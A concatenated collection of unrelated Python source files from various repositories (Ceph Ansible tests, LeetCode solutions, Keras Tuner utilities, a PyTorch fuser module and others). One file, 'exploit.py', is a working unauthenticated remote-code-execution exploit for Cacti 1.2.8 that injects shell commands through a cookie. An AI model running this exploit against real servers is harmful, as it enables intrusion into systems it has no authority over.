'activate', '--all'] assert result['rc'] == rc assert result['stderr'] == stderr assert result['stdout'] == stdout @patch.object(os.path, 'exists', return_value=True) @patch('ansible.module_utils.basic.AnsibleModule.exit_json') @patch('ansible.module_utils.basic.AnsibleModule.run_command') def test_activate_path_exists(self, m_run_command, m_exit_json, m_os_path): ca_test_common.set_module_args({ 'path': fake_path }) m_exit_json.side_effect = ca_test_common.exit_json stdout = '' stderr = '' rc = 0 m_run_command.return_value = rc, stdout, stderr with pytest.raises(ca_test_common.AnsibleExitJson) as result: ceph_volume_simple_activate.main() result = result.value.args[0] assert result['changed'] assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', '--file', fake_path] assert result['rc'] == rc assert result['stderr'] == stderr assert result['stdout'] == stdout @patch.object(os.path, 'exists', return_value=False) @patch('ansible.module_utils.basic.AnsibleModule.fail_json') def test_activate_path_not_exists(self, m_fail_json, m_os_path): ca_test_common.set_module_args({ 'path': fake_path }) m_fail_json.side_effect = ca_test_common.fail_json with pytest.raises(ca_test_common.AnsibleFailJson) as result: ceph_volume_simple_activate.main() result = result.value.args[0] assert result['msg'] == '{} does not exist'.format(fake_path) assert result['rc'] == 1 @patch('ansible.module_utils.basic.AnsibleModule.exit_json') @patch('ansible.module_utils.basic.AnsibleModule.run_command') def test_activate_without_systemd(self, m_run_command, m_exit_json): ca_test_common.set_module_args({ 'osd_id': fake_id, 'osd_fsid': fake_uuid, 'systemd': False }) m_exit_json.side_effect = ca_test_common.exit_json stdout = '' stderr = '' rc = 0 m_run_command.return_value = rc, stdout, stderr with pytest.raises(ca_test_common.AnsibleExitJson) as result: ceph_volume_simple_activate.main() result = result.value.args[0] assert result['changed'] assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', fake_id, fake_uuid, '--no-systemd'] assert result['rc'] == rc assert result['stderr'] == stderr assert result['stdout'] == stdout @patch.dict(os.environ, {'CEPH_CONTAINER_BINARY': fake_container_binary}) @patch.dict(os.environ, {'CEPH_CONTAINER_IMAGE': fake_container_image}) @patch('ansible.module_utils.basic.AnsibleModule.exit_json') @patch('ansible.module_utils.basic.AnsibleModule.run_command') def test_activate_with_container(self, m_run_command, m_exit_json): ca_test_common.set_module_args({ 'osd_id': fake_id, 'osd_fsid': fake_uuid, }) m_exit_json.side_effect = ca_test_common.exit_json stdout = '' stderr = '' rc = 0 m_run_command.return_value = rc, stdout, stderr with pytest.raises(ca_test_common.AnsibleExitJson) as result: ceph_volume_simple_activate.main() result = result.value.args[0] assert result['changed'] assert result['cmd'] == [fake_container_binary, 'run', '--rm', '--privileged', '--ipc=host', '--net=host', '-v', '/etc/ceph:/etc/ceph:z', '-v', '/var/lib/ceph/:/var/lib/ceph/:z', '-v', '/var/log/ceph/:/var/log/ceph/:z', '-v', '/run/lvm/:/run/lvm/', '-v', '/run/lock/lvm/:/run/lock/lvm/', '--entrypoint=ceph-volume', fake_container_image, '--cluster', fake_cluster, 'simple', 'activate', fake_id, fake_uuid] assert result['rc'] == rc assert result['stderr'] == stderr assert result['stdout'] == stdout
1.945313
2
setup.py
Minterious/minter-monitoring
2
11867
import setuptools setuptools.setup( name='mintermonitoring', version='1.0.0', packages=setuptools.find_packages(include=['mintermonitoring']) )
1.171875
1
Python/Back_solve_python/back_joon/StringArray/P10808.py
skyriv213/Studyriv
0
11868
<reponame>skyriv213/Studyriv s = input() num = [0] * 26 for i in range(len(s)): num[ord(s[i])-97] += 1 for i in num: print(i, end = " ") if i == len(num)-1: print(i)
3.328125
3
src/reliefcpp/utils.py
ferrocactus/reliefcpp
0
11869
<gh_stars>0 from enum import Enum from numpy import isin class Metric(Enum): EUCLIDEAN = 0 MANHATTAN = 1 HAMMING = 2 L2 = 3 L1 = 4 metric_names = [ "euclidean", "manhattan", "hamming", "l2", "l1" ] def _validate_metric(metric_name): if isinstance(metric_name, Metric): return metric_name.value elif isinstance(metric_name, str): metric_name = metric_name.lower() return metric_names.index(metric_name) elif isinstance(metric_name, int): return metric_name else: raise ValueError("Could not identify metric.")
3.140625
3
utilityFiles/createValidationDatasetFromXYTrainWithCandidates.py
jmfinelli/JavaNeuralDecompiler
1
11870
import pandas as pd import os.path length_switch = True max_body_length = 50 process_candidates = os.path.exists('./datasets/candidates.output') x_train = open('./datasets/x_train').readlines() x_train = [x.rstrip('\n') for x in x_train] y_train = open('./datasets/y_train').readlines() y_train = [x.rstrip('\n') for x in y_train] x_valid = open('./datasets/x_valid').readlines() x_valid = [x.rstrip('\n') for x in x_valid] y_valid = open('./datasets/y_valid').readlines() y_valid = [x.rstrip('\n') for x in y_valid] bytecodes = open('./datasets/bytecode.output').readlines() bytecodes = [x.rstrip('\n') for x in bytecodes] references = open('./datasets/references.output').readlines() references = [x.rstrip('\n') for x in references] if (process_candidates): candidates = open('./datasets/candidates.output').readlines() candidates = [x.rstrip('\n') for x in candidates] df_pairs = pd.DataFrame({'source': bytecodes, 'target' : references, 'candidates': candidates }) else: df_pairs = pd.DataFrame({'source': bytecodes, 'target': references }) if (length_switch): mask = df_pairs['source'].apply(lambda x: len(x.split()) <= max_body_length) df_pairs = df_pairs.loc[mask] df_train = pd.DataFrame({'source': x_train + x_valid, 'target' : y_train + y_valid }) df_valid = df_pairs.merge(df_train, on='source', indicator=True, how='left')\ .query('_merge=="left_only"')\ .drop('_merge', axis=1)\ .drop('target_y', axis=1) # df_valid = df_valid.sample(frac=1).reset_index(drop=True).sample(50000) with open('./datasets/remaining_sources', 'w') as filehandle: filehandle.writelines("%s\n" % place for place in df_valid['source']) with open('./datasets/remaining_references', 'w') as filehandle: filehandle.writelines("%s\n" % place for place in df_valid['target_x']) if (process_candidates): with open('./datasets/remaining_candidates', 'w') as filehandle: filehandle.writelines("%s\n" % place for place in df_valid['candidates'])
2.375
2
py/Utility.GetData.py
mathematicalmichael/SpringNodes
51
11871
import System dataKey, _ = IN OUT = System.AppDomain.CurrentDomain.GetData("_Dyn_Wireless_%s" % dataKey)
1.289063
1
codes_/1189_Maximum_Number_of_Balloons.py
SaitoTsutomu/leetcode
0
11872
<reponame>SaitoTsutomu/leetcode # %% [1189. *Maximum Number of Balloons](https://leetcode.com/problems/maximum-number-of-balloons/) # 問題:textから'ballon'を構成できる数を返せ # 解法:collections.Counterを用いる class Solution: def maxNumberOfBalloons(self, text: str) -> int: c = collections.Counter(text) return min(c[s] // n for s, n in collections.Counter("balloon").items())
3.578125
4
src/Quiet.X.Tests/i2c_test.py
callwyat/Quiet-Firmware
0
11873
from quiet_coms import find_quiet_ports from quiet import Quiet import time if 'EXIT_ON_FAIL' not in locals(): VERBOSE = True EXIT_ON_FAIL = True class QuietI2C(Quiet): def __init__(self, coms, **kargs) -> None: Quiet.__init__(self, coms, **kargs) def raw_write(self, addr: int, data: bytearray): command = f'IIC:ADDR {addr};WRIT' self.writeIEEE(command, data) def raw_read(self, addr: int, readCount: int) -> bytearray: message = f'IIC:ADDR {addr};READ? {readCount}' return self.queryIEEE(message) def register_write(self, address: int, register:int, data: int, dataSize=2): self.write(f'IIC:ADDR {address};REGI:ADDR {register};RSIZ {dataSize};WRIT {data}') def register_read(self, address: int, register:int, dataSize=1) -> int: return self.query_int(f'IIC:ADDR {address};REGI:ADDR {register};RSIZ {dataSize};READ?') def enable_master_mode(self) -> None: self.set_and_verify('IIC:MODE', 'MAST') def disable(self) -> None: self.set_and_verify('IIC:MODE', 'OFF') def acknowledged(self) -> bool: ack = self.query('IIC:ACK?') return '1' in ack def _i2c_register_read_test(i: QuietI2C, address:int, register:int, expectation:int): value = i.register_read(address, register, 2) if value != expectation: message = f'Failure at {hex(address)}:{hex(register)}. Expected {hex(expectation)} but read {hex(value)}' if EXIT_ON_FAIL: raise Exception() else: print(message) elif VERBOSE: print(f'REG\t{hex(address)}:{hex(register)} -> {hex(value)}') def _i2c_register_write_test(i: QuietI2C, address:int, register:int, value:int): i.register_write(address, register, value, 2) time.sleep(0.1) _i2c_register_read_test(i, address, register, value) def _i2c_raw_write(i: QuietI2C, address:int, data:bytearray): i.raw_write(address, data) if VERBOSE: print(f'RAW\t{hex(address)} -> {str(data)[10:].strip(")")}') def _i2c_raw_read_test(i: QuietI2C, address:int, expected:bytearray): response = i.raw_read(address, len(expected)) if response != expected: message = f'Failure at {hex(address)}. Expected {expected} but read {response}' if EXIT_ON_FAIL: raise Exception(message) else: print(message) elif VERBOSE: print(f'RAW\t{hex(address)} <- {response}') def _i2c_check_error(i: QuietI2C, error_name: str, expectation: int): error = i.error() if error != expectation: message = f'Failure {error_name}. Expected {hex(expectation)} received {hex(error)}' if EXIT_ON_FAIL: raise Exception(message) else: print(message) elif VERBOSE: print(f'{error_name.ljust(32)} Pass') def _i2c_check_lower_limit(i: QuietI2C, command:str, low:int, error_name:str, error_code, delay:int=0): under = low - 1 i.write(f'{command} {under}') if delay > 0: time.sleep(delay) _i2c_check_error(i, f'UNDER {error_name}', error_code if under >= 0 else 0x0110) i.write(f'{command} {low}') if delay > 0: time.sleep(delay) _i2c_check_error(i, f'LOWER {error_name}', 0x00) def _i2c_check_upper_limit(i: QuietI2C, command:str, high:int, error_name:str, error_code, delay:int=0): i.write(f'{command} {high}') if delay > 0: time.sleep(delay) _i2c_check_error(i, f'UPPER {error_name}', 0x00) i.write(f'{command} {high + 1}') if delay > 0: time.sleep(delay) _i2c_check_error(i, f'OVER {error_name}', error_code) def _i2c_check_limit(i: QuietI2C, command:str, low:int, high:int, error_name:str, error_code): _i2c_check_lower_limit(i, command, low, error_name, error_code) _i2c_check_upper_limit(i, command, high, error_name, error_code) def _i2c_check_acknowledge(i, expectation:bool): ack = i.acknowledged() if ack != expectation: if ack: message = f'Failure ACKNOWLEDGED. Expected NO_ACKNOWLEDGED received ACKNOWLEDGED' else: message = f'Failure ACKNOWLEDGED. Expected ACKNOWLEDGED received NO_ACKNOWLEDGED' if EXIT_ON_FAIL: raise Exception(message) else: print(message) elif VERBOSE: print(f'{("" if ack else "NO_")}ACKNOWLEDGED'.ljust(32) + ' Pass') def i2c_test_errors(i: QuietI2C) -> bool: # Clear Errors i.error() # Verify the second hook works if i.query_int('SYST:ERR?') != 0: messsage = 'Failure "SYS:ERR?" Command' if EXIT_ON_FAIL: raise Exception(messsage) else: print(messsage) elif VERBOSE: print('IIC:REGI:ERRO? Pass') i.disable() _i2c_check_error(i, 'ERROR_NONE', 0x00) _i2c_check_limit(i, 'IIC:BAUD', 16000, 1000000, 'INVALID_BAUD', 0x0B01) _i2c_check_limit(i, 'IIC:TIME', 1, 255, 'INVALID_TIMEOUT', 0x0B02) _i2c_check_limit(i, 'IIC:ADDR', 0, 127, 'INVALID_ADDRESS', 0x0B03) i.write('IIC:MODE MAS') _i2c_check_error(i, 'ERROR_INVALID_MODE', 0x0B04) _i2c_check_limit(i, 'IIC:REGI:RSIZ', 1, 2, 'INVALID_RSIZE', 0x0B20) _i2c_check_limit(i, 'IIC:REGI:ADDR', 0, 255, 'INVALID_REGISTER_ADDRESS', 0x0B21) i.write('IIC:REGI:WRIT 1') _i2c_check_error(i, 'ERROR_DISABLED_WRITE', 0x0B10) i.query('IIC:REGI:READ?') i.com.flushInput() _i2c_check_error(i, 'ERROR_DISABLED_READ', 0x0B11) i.write('IIC:WRIT #11A') _i2c_check_error(i, 'ERROR_DISABLED_WRITE', 0x0B10) i.query('IIC:READ? 2') _i2c_check_error(i, 'ERROR_DISABLED_READ', 0x0B11) i.reset() i.enable_master_mode() try: i.write('IIC:ADDR 0x50;REGI:ADDR 0xFF;RSIZ 1') i.com.flushInput() _i2c_check_upper_limit(i, 'IIC:REGI:WRIT', 255, 'INVALID_REGISTER_VALUE', 0x0B22, 0.1) i.write('IIC:WRIT #10') i.com.flushInput() time.sleep(0.1) _i2c_check_error(i, 'I2C_ERROR_INVALID_WRITE_SIZE', 0x0B31) i.write('IIC:READ? 0') i.com.flushInput() time.sleep(0.1) _i2c_check_error(i, 'I2C_ERROR_INVALID_READ_SIZE', 0x0B32) i.write('IIC:WRIT #296' + '0123456789ABCDEF' * 6) i.com.flushInput() time.sleep(0.1) _i2c_check_error(i, 'I2C_ERROR_INVALID_WRITE_SIZE', 0x0B31) i.query('IIC:READ? 96') i.com.flushInput() time.sleep(0.1) _i2c_check_error(i, 'I2C_ERROR_INVALID_READ_SIZE', 0x0B32) i.write('IIC:READ?') i.com.flushInput() _i2c_check_error(i, 'I2C_ERROR_INVALID_READ_SYNTAX', 0x0B33) i.write('IIC:ADDR 0x10;WRIT #13ABC') time.sleep(0.1) _i2c_check_acknowledge(i, False) finally: i.disable() def i2c_test(i: QuietI2C) -> bool: i.reset() i.enable_master_mode() try: _i2c_register_read_test(i, 0x50, 0xFE, 0x5449) _i2c_register_read_test(i, 0x50, 0xFF, 0x1004) _i2c_register_write_test(i, 0x50, 0x0C, 0x05AA) _i2c_register_write_test(i, 0x50, 0x08, 0x1E00) _i2c_register_write_test(i, 0x50, 0x0A, 0x5F80) _i2c_raw_write(i, 0x50, bytearray([0xFF])) _i2c_raw_read_test(i, 0x50, bytearray([0x10, 0x04])) _i2c_raw_write(i, 0x50, bytearray([0x0C, 0x05, 0xA0])) _i2c_raw_write(i, 0x50, bytearray([0x0C])) _i2c_raw_read_test(i, 0x50, bytearray([0x05, 0xA0])) finally: i.disable() if __name__ == "__main__": q2c = QuietI2C(None, log_path='usb_log.txt') i2c_test(q2c) i2c_test_errors(q2c) i2c_test(q2c) print('All I2C Tests Passed')
2.40625
2
WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/Overflow/_Data-Structures/binary-tree/binary-tree-tilt.py
webdevhub42/Lambda
5
11874
<reponame>webdevhub42/Lambda<gh_stars>1-10 # Source : https://leetcode.com/problems/binary-tree-tilt/description/ # Date : 2017-12-26 # Definition for a binary tree node. # class TreeNode: # def __init__(self, x): # self.val = x # self.left = None # self.right = None class Solution: def findTilt(self, root): """ :type root: TreeNode :rtype: int """ global ans ans = 0 self.sumOfNode(root) return ans def sumOfNode(self, root): if root == None: return 0 left = self.sumOfNode(root.left) right = self.sumOfNode(root.right) global ans ans += abs(left - right) return left + right + root.val
3.53125
4
kerastuner/engine/tuner_utils.py
krantirk/keras-tuner
1
11875
# Copyright 2019 The Keras Tuner Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utilities for Tuner class.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import contextlib import math from collections import defaultdict import numpy as np import time import random import hashlib import tensorflow as tf from tensorflow import keras from ..abstractions import display class TunerStats(object): """Track tuner statistics.""" def __init__(self): self.num_generated_models = 0 # overall number of instances generated self.num_invalid_models = 0 # how many models didn't work self.num_oversized_models = 0 # num models with params> max_params def summary(self, extended=False): display.subsection('Tuning stats') display.display_settings(self.get_config()) def get_config(self): return { 'num_generated_models': self.num_generated_models, 'num_invalid_models': self.num_invalid_models, 'num_oversized_models': self.num_oversized_models } @classmethod def from_config(cls, config): stats = cls() stats.num_generated_models = config['num_generated_models'] stats.num_invalid_models = config['num_invalid_models'] stats.num_oversized_models = config['num_oversized_models'] return stats def get_max_epochs_and_steps(fit_args, fit_kwargs): if fit_args: x = tf.nest.flatten(fit_args)[0] else: x = tf.nest.flatten(fit_kwargs.get('x'))[0] batch_size = fit_kwargs.get('batch_size', 32) if hasattr(x, '__len__'): max_steps = math.ceil(float(len(x)) / batch_size) else: max_steps = fit_kwargs.get('steps') max_epochs = fit_kwargs.get('epochs', 1) return max_epochs, max_steps class TunerCallback(keras.callbacks.Callback): def __init__(self, tuner, trial, execution): self.tuner = tuner self.trial = trial self.execution = execution def on_epoch_begin(self, epoch, logs=None): self.tuner.on_epoch_begin( self.execution, self.model, epoch, logs=logs) def on_batch_begin(self, batch, logs=None): self.tuner.on_batch_begin(self.execution, self.model, batch, logs) def on_batch_end(self, batch, logs=None): self.tuner.on_batch_end(self.execution, self.model, batch, logs) def on_epoch_end(self, epoch, logs=None): self.tuner.on_epoch_end( self.execution, self.model, epoch, logs=logs) class Display(object): def __init__(self, host): self.host = host self.cpu_usage = [] self.gpu_usage = [] self.batch_history = defaultdict(list) self.epoch_pbar = None def on_execution_begin(self, trial, execution, model): # new model summary if len(trial.executions) == 1: display.section('New model') trial.summary() # execution info if needed if trial.max_executions > 1: display.subsection('Execution %d/%d' % (len(trial.executions), trial.max_executions)) def on_trial_end(self, averaged_metrics, best_metrics, objective, remaining_trials, max_trials): # train summary current = averaged_metrics best = best_metrics rows = [['Name', 'Best model', 'Current model']] for name in best.names: best_value = round(best.get_best_value(name), 4) current_value = round(current.get_best_value(name), 4) row = [name, best_value, current_value] if name == objective: if best_value == current_value: row = display.colorize_row(row, 'green') else: row = display.colorize_row(row, 'red') rows.append(row) display.display_table(rows) # Tuning budget exhausted if remaining_trials < 1: display.highlight('Hypertuning complete - results in %s' % self.host.results_dir) # TODO: final summary else: display.highlight('%d/%d trials left' % (remaining_trials, max_trials)) def on_epoch_begin(self, execution, model, epoch, logs=None): # reset counters self.epoch_history = defaultdict(list) self.gpu_usage = [] self.cpu_usage = [] # epoch bar self.epoch_pbar = display.progress_bar( total=execution.max_steps, leave=True, unit='steps') def on_epoch_end(self, execution, model, epoch, logs=None): # compute stats final_epoch_postfix = {} for m, v in logs.items(): final_epoch_postfix[m] = round(v, 4) # epoch bar self.epoch_pbar.set_postfix(final_epoch_postfix) self.epoch_pbar.close() def on_batch_end(self, execution, model, batch, logs=None): logs = logs or {} self.epoch_pbar.update(1) # computing metric statistics for k, v in logs.items(): self.batch_history[k].append(v) avg_metrics = self._avg_metrics(self.batch_history) self.epoch_pbar.set_postfix(avg_metrics) # create bar desc with updated statistics description = '' host_status = self.host.get_status() if len(host_status['gpu']): gpu_usage = [float(gpu['usage']) for gpu in host_status['gpu']] gpu_usage = int(np.average(gpu_usage)) self.gpu_usage.append(gpu_usage) description += '[GPU:%3s%%]' % int(np.average(self.gpu_usage)) self.cpu_usage.append(int(host_status['cpu']['usage'])) description += '[CPU:%3s%%]' % int(np.average(self.cpu_usage)) description += 'Epoch %s/%s' % (execution.epochs_seen + 1, execution.max_epochs) self.epoch_pbar.set_description(description) def _avg_metrics(self, metrics): agg_metrics = {} for metric_name, values in metrics.items(): if metric_name == 'batch' or metric_name == 'size': continue agg_metrics[metric_name] = '%.4f' % np.average(values) return agg_metrics def generate_trial_id(): s = str(time.time()) + str(random.randint(1, 1e7)) return hashlib.sha256(s.encode('utf-8')).hexdigest()[:32] def format_execution_id(i, executions_per_trial): execution_id_length = math.ceil( math.log(executions_per_trial, 10)) execution_id_template = '%0' + str(execution_id_length) + 'd' execution_id = execution_id_template % i return execution_id @contextlib.contextmanager def maybe_distribute(distribution_strategy): if distribution_strategy is None: yield else: with distribution_strategy.scope(): yield
2.09375
2
plotter.py
ZiegHailo/SMUVI
0
11876
<reponame>ZiegHailo/SMUVI __author__ = 'zieghailo' import matplotlib.pyplot as plt # plt.ion() def show(): plt.show() plt.get_current_fig_manager().full_screen_toggle() def plot_graph(graph): # plt.ion() x = [p.x for p in graph.points] y = [p.y for p in graph.points] plt.plot(x, y, 'b*') plt.draw() def plot_arrows(graph): for p in graph.points: x = p.x y = p.y for c in p.connections: cx = c.x cy = c.y # ax.arrow(x, y, cx-x, cy-y) plt.plot([x, cx], [y, cy], 'k') plt.draw() def plot_visited(visited): x = [p.x for p in visited] y = [p.y for p in visited] plt.plot(x, y, 'ro', ms=10) plt.draw() def plot_connection(start, end): plt.plot([start.x, end.x], [start.y, end.y], 'g', linewidth=4) def start_gui(graph): fig = plt.figure(1) ax = fig.add_subplot(111) ax.set_title('click to build line segments') ax.axis('equal') line, = ax.plot([0, 100], [0, 100], 'b.') # empty line pointbuilder = PointBuilder(line, ax, graph) fig.waitforbuttonpress(0) class PointBuilder: def __init__(self, points, ax, graph): self.points = points self.ax = ax self.graph = graph self.cid = points.figure.canvas.mpl_connect('button_press_event', self) self.kid = points.figure.canvas.mpl_connect('key_press_event', self) def __call__(self, event): print 'click', event if event.inaxes!=self.points.axes: return self.graph.add_point(event.xdata, event.ydata) x = [p.x for p in self.graph.points] y = [p.y for p in self.graph.points] plt.cla() self.graph.build_graph() plot_arrows(self.graph) plot_graph(self.graph) if event.key != 'x': plt.waitforbuttonpress(0) if __name__ == "__main__": start_gui()
2.9375
3
fannypack/utils/_deprecation.py
brentyi/hfdsajk
5
11877
import warnings from typing import Callable, Optional, TypeVar, cast CallableType = TypeVar("CallableType", bound=Callable) def deprecation_wrapper(message: str, function_or_class: CallableType) -> CallableType: """Creates a wrapper for a deprecated function or class. Prints a warning the first time a function or class is called. Args: message (str): Warning message. function_or_class (CallableType): Function or class to wrap. Returns: CallableType: Wrapped function/class. """ warned = False def curried(*args, **kwargs): # pragma: no cover nonlocal warned if not warned: warnings.warn(message, DeprecationWarning, stacklevel=2) warned = True return function_or_class(*args, **kwargs) return cast(CallableType, curried) def new_name_wrapper( old_name: str, new_name: str, function_or_class: CallableType ) -> CallableType: """Creates a wrapper for a renamed function or class. Prints a warning the first time a function or class is called with the old name. Args: old_name (str): Old name of function or class. Printed in warning. new_name (str): New name of function or class. Printed in warning. function_or_class (CallableType): Function or class to wrap. Returns: CallableType: Wrapped function/class. """ return deprecation_wrapper( f"{old_name} is deprecated! Use {new_name} instead.", function_or_class )
3.203125
3
write/5_json_writer.py
pavlovprojects/python_qa_test_data
0
11878
import json data = { "users": [ {"Name": "Dominator", "skill": 100, "gold": 99999, "weapons": ['Sword', 'Atomic Laser']}, {"Name": "Looser", "skill": 1, "gold": -100000, "weapons": [None, None, None]}, ] } with open("example.json", "w") as f: s = json.dumps(data, indent=4) f.write(s)
2.765625
3
src/utils.py
sequoia-tree/cs370
1
11879
<filename>src/utils.py<gh_stars>1-10 from md_utils import * from py_utils import *
1.234375
1
practice/ai/machine-learning/digital-camera-day-or-night/digital-camera-day-or-night.py
zeyuanxy/HackerRank
4
11880
<reponame>zeyuanxy/HackerRank if __name__ == "__main__": data = raw_input().strip(',\n').split(' ') count = 0 total = 0 for pxl in data: pxl = pxl.split(',') mean = 0 for i in pxl: mean += int(i) mean /= 3 if mean < 70: count += 1 total += 1 if float(count) / total > 0.4: print 'night' else: print 'day'
3.40625
3
Mini Projects/RockPaperScissors/RPS.py
Snowystar122/Python-Projects
0
11881
import random as r # Sets up required variables running = True user_wins = 0 comp_wins = 0 answers = ["R", "P", "S"] win_combos = ["PR", "RS", "SP"] # Welcome message print("Welcome to Rock-Paper-Scissors. Please input one of the following:" "\n'R' - rock\n'P' - paper\n'S' - scissors\nto get started.") while running: # Running game of rock, paper, scissors if user_wins == 3 or comp_wins == 3: print(f"Game is over. The score was {user_wins}-{comp_wins}. Thanks for playing.") break user_guess = input("Guess:").upper() if user_guess.upper() not in answers: print("You didn't enter a valid letter.") break comp_guess = answers[r.randint(0, 2)] guess_join = user_guess + comp_guess if guess_join[0] == guess_join[1]: print(f"You both guessed {user_guess}!\nThe current score is {user_wins}-{comp_wins}.") else: # Checks to see if computer or user has won the round. if any(guess_join == elem in win_combos for elem in win_combos): user_wins += 1 print(f"You win! Score is {user_wins}-{comp_wins}.") else: comp_wins += 1 print(f"You lose! Score is {user_wins}-{comp_wins}.")
4.09375
4
pybullet-gym/pybulletgym/agents/agents_baselines.py
SmaleZ/vcl_diayn
2
11882
from baselines import deepq def add_opts(parser): pass class BaselinesDQNAgent(object): ''' classdocs ''' def __init__(self, opts): self.metadata = { 'discrete_actions': True, } self.opts = opts self.agent = None def configure(self, observation_space_shape, nb_actions): pass def train(self, env, nb_steps, visualize, verbosity): model = deepq.models.mlp([64]) self.agent = deepq.learn( env, q_func=model, lr=1e-3, max_timesteps=nb_steps, buffer_size=50000, exploration_fraction=0.1, exploration_final_eps=0.02, print_freq=10 if verbosity else None, callback=env.render if visualize else None ) def test(self, env, nb_episodes, visualize): episodes = 0 while episodes < nb_episodes: obs, done = env.reset(), False episode_rew = 0 while not done: if visualize: env.render() obs, rew, done, _ = env.step(self.agent(obs[None])[0]) episode_rew += rew print("Episode reward", episode_rew) episodes += 1 def load_weights(self, load_file): self.agent = deepq.load(load_file) def save_weights(self, save_file, overwrite): self.agent.save(save_file)
2.34375
2
exploit.py
hexcowboy/CVE-2020-8813
0
11883
#!/usr/bin/python3 import requests import click from rich import inspect from rich.console import Console from url_normalize import url_normalize from urllib.parse import quote console = Console() def shell_encode(string): return string.replace(" ", "${IFS}") @click.command() @click.option("-u", "--url", prompt="Target URL", help="The URL of the Cacti installation") @click.option("-p", "--payload", prompt="Payload", help="The payload that you want to execute on the target") def exploit(url, payload): """Cacti v1.2.8 Unauthenticated Remote Code Execution""" # Normalize URL input, URL encode the payload url = url + "/graph_realtime.php?action=init" url = url_normalize(url, default_scheme="http") payload = shell_encode(payload) payload = quote(payload) cookies = {"Cacti": payload} # Check if target is vulnerable try: with console.status("Checking to see if target is vulnerable"): request = requests.get(url) except: console.print(f'Could not connect to the host, please check the URL again: {url}', style="red") exit(1) inspect(request) if request.status_code == 200: with console.status("Realtime graph found, sending payload."): requests.get(url, cookies=cookies) else: click.echo("Realtime graph not found. The target may not be vulnerable.") if __name__ == "__main__": exploit()
2.734375
3
common/src/stack/command/stack/commands/set/firmware/model/imp/__init__.py
kmcm0/stacki
123
11884
# @copyright@ # Copyright (c) 2006 - 2019 Teradata # All rights reserved. Stacki(r) v5.x stacki.com # https://github.com/Teradata/stacki/blob/master/LICENSE.txt # @copyright@ # # @rocks@ # Copyright (c) 2000 - 2010 The Regents of the University of California # All rights reserved. Rocks(r) v5.4 www.rocksclusters.org # https://github.com/Teradata/stacki/blob/master/LICENSE-ROCKS.txt # @rocks@ import stack.commands class Command(stack.commands.set.firmware.command): """ Associates a firmware implementation with one or more models. <arg type='string' name='models'> One or more models to associate the implementation with. </arg> <param type='string' name='imp'> The name of the implementation to associate with the provided models. </param> <param type='string' name='make'> The make of the models. </param> <example cmd="set firmware model imp m7800 m6036 imp=mellanox_6xxx_7xxx make=mellanox"> Sets the mellanox_6xxx_7xxx implementation as the one to run for the models m7800 and m6036 for make mellanox. </example> """ def run(self, params, args): self.runPlugins(args = (params, args))
2.171875
2
torch/jit/_fuser.py
ljhOfGithub/pytorch
1
11885
<reponame>ljhOfGithub/pytorch import contextlib import torch from typing import List, Tuple @contextlib.contextmanager def optimized_execution(should_optimize): """ A context manager that controls whether the JIT's executor will run optimizations before executing a function. """ stored_flag = torch._C._get_graph_executor_optimize() torch._C._set_graph_executor_optimize(should_optimize) try: yield finally: torch._C._set_graph_executor_optimize(stored_flag) @contextlib.contextmanager def fuser(name): """ A context manager that facilitates switching between backend fusers. Valid names: * ``fuser0`` - enables only legacy fuser * ``fuser1`` - enables only NNC * ``fuser2`` - enables only nvFuser """ old_cpu_fuse = torch._C._jit_can_fuse_on_cpu() old_gpu_fuse = torch._C._jit_can_fuse_on_gpu() old_texpr_fuser_state = torch._C._jit_texpr_fuser_enabled() old_nvfuser_state = torch._C._jit_nvfuser_enabled() if name == 'fuser0': # legacy fuser torch._C._jit_override_can_fuse_on_cpu(True) torch._C._jit_override_can_fuse_on_gpu(True) torch._C._jit_set_texpr_fuser_enabled(False) torch._C._jit_set_nvfuser_enabled(False) elif name == 'fuser1': # NNC old_profiling_executor = torch._C._jit_set_profiling_executor(True) old_profiling_mode = torch._C._jit_set_profiling_mode(True) torch._C._jit_override_can_fuse_on_cpu(True) torch._C._jit_override_can_fuse_on_gpu(True) torch._C._jit_set_texpr_fuser_enabled(True) torch._C._jit_set_nvfuser_enabled(False) elif name == 'fuser2': # nvFuser torch._C._jit_override_can_fuse_on_cpu(False) torch._C._jit_override_can_fuse_on_gpu(False) torch._C._jit_set_texpr_fuser_enabled(False) torch._C._jit_set_nvfuser_enabled(True) else: raise Exception("unrecognized fuser option") try: yield finally: if name == 'fuser1': # NNC torch._C._jit_set_profiling_executor(old_profiling_executor) torch._C._jit_set_profiling_mode(old_profiling_mode) # recover the previous values torch._C._jit_override_can_fuse_on_cpu(old_cpu_fuse) torch._C._jit_override_can_fuse_on_gpu(old_gpu_fuse) torch._C._jit_set_texpr_fuser_enabled(old_texpr_fuser_state) torch._C._jit_set_nvfuser_enabled(old_nvfuser_state) last_executed_optimized_graph = torch._C._last_executed_optimized_graph def _get_differentiable_graph_node(node, diff_node): if node.kind() == 'prim::DifferentiableGraph': diff_node.append(node) else: for block in node.blocks(): for n in block.nodes(): _get_differentiable_graph_node(n, diff_node) def _graph_for(self, *args, **kwargs): return _script_method_graph_for(self, self, *args, **kwargs) def _script_method_graph_for(self, parent, *args, **kwargs): try: dbs = parent.get_debug_state() eps = list(dbs.execution_plans.values()) assert(len(eps) == 1) graph = eps[0].graph.copy() # graph_executor_states for differentiable node fw_states = eps[0].code.differentiable_op_executor_states() diff_nodes: List[torch._C.Node] = [] for n in graph.nodes(): _get_differentiable_graph_node(n, diff_nodes) assert(len(fw_states) == len(diff_nodes)) # swap each differentiable graph with optimized graph in their execution plan for n, state in zip(diff_nodes, fw_states): fw_execution_plans = list(state.execution_plans.values()) # we can only update the subgraph when there's a unique execution # plan. Avoid assert here so we would skip the ones that can't be # updated while try the best effort to update other nodes. if len(fw_execution_plans) == 1: n.g_('Subgraph', fw_execution_plans[0].graph) return graph except Exception: # fallback approach, we just ran the graph and return the recorded optimized # graph self(*args, **kwargs) return last_executed_optimized_graph() def set_fusion_strategy(strategy: List[Tuple[str, int]]): """ Sets the type and number of specializations that can occur during fusion. Usage: provide a list of pairs (type, depth) where 